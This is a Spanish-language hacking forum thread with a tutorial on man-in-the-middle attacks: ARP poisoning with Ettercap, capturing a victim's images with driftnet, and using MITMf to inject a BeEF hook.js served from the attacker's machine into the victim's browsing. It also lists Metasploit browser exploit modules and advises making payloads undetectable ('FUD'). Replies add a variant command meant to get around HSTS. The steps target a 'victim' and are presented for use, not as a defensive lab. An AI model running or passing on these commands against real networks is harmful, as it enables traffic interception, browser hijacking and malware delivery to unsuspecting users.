comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

MITM / Man in the middle - Ettercap + MITMF + Beef Exploiting + Metasploit

  • 8 Respuestas
  • 5690 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado BrowserNet

  • *
  • Underc0der
  • Mensajes: 88
  • Actividad:
    1.67%
  • Reputación 2
  • El TioCyberPunks esta en el barco
    • Ver Perfil
  • Skype: browsernet
« en: Mayo 23, 2016, 05:41:28 pm »


Main in the middle o hombre en el medio es un ataque en la cual nosotros estaremos en el medio entre los ordenadores y el rooter capturando el trafico de datos con una metodología que pasare a explicar sin tecnicismo en una imagen:



 cuando una ordenador hace una petición a un servicio su procedimiento normal es que esta tiene que pasar al rooter y posteriormente al internet, en nuestro caso si la victima hace una petición a un servicio nosotros vamos a recibir los datos en texto plano recolectando datos de información en primer plano, el segundo envió seria al  rooter y luego al internet, en esta oportunidad voy a utilizar Ettercap la cual es una herramienta en código abierto que nos permitirá ejecutar el ataque.

Primer escenario Ettercap


En mi caso ejecutare la plataforma GUI, lo que haremos sera dirigimos a la primera pestaña que les aparecerá primero en el Ettercap daremos en "Sniff", luego de ello escogeremos nuestra interface de red, en mi caso es Eth0, automáticamente pasara a iniciar el servidor de snnifeo, luego nos dirigimos a la opción que parece en la imagen  entraremos a "Hosts" y luego procederá a hacer un análisis de rangos para ver las IP'S o ordenadores conectados ahora mismo, de igual manera escuchara a las entrantes conexiones entrantes en cualquier momento. 



Listado de red lo puedo ver en "Hosts" >> Hosts List



la IP de mi sistema de red es 192.168.179.129 , la de mi victima sera la primera que es 192.168.179.2  una ves identificado a quien haré el ataque procederemos a lanzar el ataque de la siguiente manera.



Luego de ello le daremos en aceptar, ya que estamos estableciendo una conexión entra nuestro sistema con la de la victima, luego de ello iremos a la opción "Mitm" y daremos en "ARP":



ahora daremos en primera opción "para establecer el sniffeo remoto.



al aceptar completamente ya tendríamos el envenenamiento ARP establecido, entonces lo que haré en mi caso sera utilizar driftnet, que es un capturador de imágenes remotas  de sistemas comprometidos en tiempo real, solamente añadimos nuestra interface en mi caso fue #Eth0

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@kali:~# driftnet -i eth0


Una ves establecido nuestro capturar, al momento que la victima entre a un servidor podemos capturar el trafico de imágenes,  un ejemplo mi victima esta en la siguiente web:



Nuestra victima ni siquiera sospechara nada, ya que hemos infectado la red por ende la explotación se basa en las conexiones de entrada y escucha, entonces pasamos a nuestro ordenador y vemos las imágenes capturadas:



Si desean capturar el trafico de datos en texto plano, les dejare un articulo en donde enseño el método:

No tienes permisos para ver links. Registrate o Entra con tu cuenta
Segundo escenario MITMF

Segundo escenario MITMF


MITMf tiene como objetivo proporcionar una ventanilla única para los ataques Man in the Middle y la red durante la actualización y la mejora de los ataques y técnicas existentes.

Originalmente construido para hacer frente a las deficiencias significativas de otras herramientas por ejemplo Ettercap, Mallory, ha sido re-escrito casi completamente desde cero para proporcionar un framework modular y fácilmente extensible que cualquiera puede utilizar para implementar su propio ataque MITM.

descarga:
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Lo primero que haremos sera actualizar algunos repertorios que necesitara para ejecutar sus capacidades utilitarias.
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@kali:~# apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev


Lo que haremos sera descargar el MITMF y proceder a instalar sus requerimientos para que pueda funcionar correctamente:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@kali:~# git clone https://github.com/byt3bl33d3r/MITMf
root@kali:~# cd MITMf && git submodule init && git submodule update --recursive
root@kali:~# pip install -r requirements.txt



Una ves completado todo eso, ya tendremos nuestra herramienta lista para ser usada pero antes que nada necesitaremos enfocarnos en una victima la cual sera la misma 192.168.179.2, pero antes de ello utilizaremos "BeEF" para crear nuestro servidor de infección y activarlo.
Para configuar BeFF y añadir los módulos de metasploit puede ver el siguiente articulo:

No tienes permisos para ver links. Registrate o Entra con tu cuenta



En este caso lo que haremos sera utilizar el script hook.js, ya que podemos inyectar este código malicioso en los navegadores en los servidores web que la victima entre sin que se de cuenta, para ello utilizaremos BeEF para enviarlo remotamente con el envenenamiento ARP

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@kali:~# python mitmf.py --spoof --arp -i eth0 --gateway 192.168.179.2 --target 192.168.179.132 --inject --js-url http://192.168.179.129:3000/hook.js
-i identificamos el tipo interface en mi caso "eth0", --gateway es el servicio rooter y por ende --target la ip de la victima.



entonces ya tenemos listo nuestra conexión main in the middle para infectarlo directamente al momento que la victima entre a cualquier pagina web, en mi caso mi victima entro a una pagina de adultos "Nuevamente" jajaja.



al momento que la victima entre nosotros en primer plano tendremos los datos DNS:



Como vemos vemos los datos de la victima, la cual utiliza windows 7 conectado al navegador Firefox y vemos la URL donde se inyecto el código, otro plano abriremos el panel de BeFF y tendremos su sesión captura, con la cual podemos explotar a nuestra victima.



Aqui unos metodos de explotacion:

No tienes permisos para ver links. Registrate o Entra con tu cuenta


Atacando con metasploit:




En metasploit seria aprovechar el MITMF mediante el exploit de java hace poco tiempo nuevamente hay nuevos exploit para explotar nuevos complementos:

Módulos nuevos:





auxiliary/server/browser_autopwn2
exploit/multi/browser/adobe_flash_hacking_team_uaf
exploit/multi/browser/adobe_flash_nellymoser_bof
exploit/multi/browser/adobe_flash_net_connection_confusion
exploit/multi/browser/adobe_flash_opaque_background_uaf
exploit/multi/browser/adobe_flash_shader_drawing_fill
exploit/multi/browser/adobe_flash_shader_job_overflow

No tienes permisos para ver links. Registrate o Entra con tu cuenta

root@kali:~# python mitmf.py --spoof --arp -i eth0 --gateway 192.168.179.2 --target 192.168.179.132 --inject --js-url (añadiran el payload del exploit que les carge en metasploit)




de igual manera puedes añadir : payloads ejecutables para que lo descarge y ejecute para explotar al sistema, siempre y claro deben dejarlo FUD, aqui el post para hacer tu payload indetectable:

No tienes permisos para ver links. Registrate o Entra con tu cuenta

Diferentes técnicas para crear tus payload:

No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
« Última modificación: Mayo 24, 2016, 02:01:59 am por BrowserNet »

Desconectado Random

  • *
  • Underc0der
  • Mensajes: 55
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #1 en: Mayo 23, 2016, 07:33:17 pm »
Muy buen post ! La primer parte la conocía, la segunda no tanto, pero muy lindo aporte, se agradece !

Saludos !

Desconectado Mr.BOTNNES

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Marzo 13, 2017, 03:28:04 pm »
Una consulta, en las paginas con https también sirve?

Desconectado Stiuvert

  • *
  • Colaborador
  • *
  • Mensajes: 2668
  • Actividad:
    1.67%
  • Reputación 14
    • Ver Perfil
  • Skype: stiuvert@gmail.com
  • Twitter: @Stiuvert
« Respuesta #3 en: Marzo 13, 2017, 04:37:58 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Una consulta, en las paginas con https también sirve?

Lo tienes muy complicado, pero investiga sobre SSL Strip.

Desconectado Stuxnet

  • *
  • Underc0der
  • Mensajes: 259
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Devel Security
  • Twitter: _stuxnet
« Respuesta #4 en: Marzo 14, 2017, 12:53:52 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Una consulta, en las paginas con https también sirve?

Intenta agregando --hsts

Código: Text
  1. mitmf --hsts --spoof --arp -i INTERFACE --gateway 192.168.1.1 --inject --js-url http://192.168.1.100:3000/hook.js

Aparte te aconsejo tener la version de Twisted 15.5.0

Código: Text
  1. pip install Twisted==15.5.0
« Última modificación: Marzo 14, 2017, 03:29:07 pm por Stuxnet »
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado HckH3x

  • *
  • Underc0der
  • Mensajes: 55
  • Actividad:
    0%
  • Reputación 0
  • ¡Arrrggg pirata!
    • Ver Perfil
« Respuesta #5 en: Marzo 14, 2017, 02:17:42 pm »
Buenísimo aporte, se nota tu esfuerzo.
Sigue así, ayudas bastante en el aprendizaje.
Jabber: HckH3x@jabb3r.org

Desconectado zoro248

  • *
  • Underc0der
  • Mensajes: 242
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #6 en: Marzo 22, 2017, 09:32:46 pm »
Buen post, se deberian actualizar los links

Desconectado kackerweno

  • *
  • Underc0der
  • Mensajes: 51
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #7 en: Abril 04, 2017, 09:56:51 pm »
el ssl strip funciona todavia con cain???????????

Conectado puntoCL

  • *
  • Moderator
  • Mensajes: 263
  • Actividad:
    6.67%
  • Reputación 5
  • Magallanes no es chile :D
    • Ver Perfil
« Respuesta #8 en: Abril 05, 2017, 01:37:02 am »
@No tienes permisos para ver links. Registrate o Entra con tu cuenta

Si es cain de oxid. es un no




 

¿Te gustó el post? COMPARTILO!



"Escaneo Invisible" con NMAP y Metasploit

Iniciado por Stiuvert

Respuestas: 3
Vistas: 6630
Último mensaje Junio 21, 2013, 09:33:46 pm
por GhostFire
Obtener contraseña (admin) de windows con metasploit usando el módulo phish_windows_credentials

Iniciado por LionSec

Respuestas: 8
Vistas: 3006
Último mensaje Mayo 25, 2015, 02:49:25 pm
por MagoAstral
Metasploit + Metasm (Ghost Writing ASM) para crear un backdoor indetectable

Iniciado por Aryenal.Bt

Respuestas: 11
Vistas: 5484
Último mensaje Noviembre 20, 2012, 12:25:34 am
por BCKTR1X
Curso Metasploit - Part. 3 - Como obteber un meterpreter con EternalBlue

Iniciado por puntoCL

Respuestas: 3
Vistas: 1826
Último mensaje Octubre 01, 2018, 03:05:53 pm
por Kyxda
[Armitage] Administrador Gráfico de Cyber Ataques para Metasploit

Iniciado por LucaSthefano

Respuestas: 2
Vistas: 2668
Último mensaje Abril 29, 2013, 07:20:08 pm
por Markuss97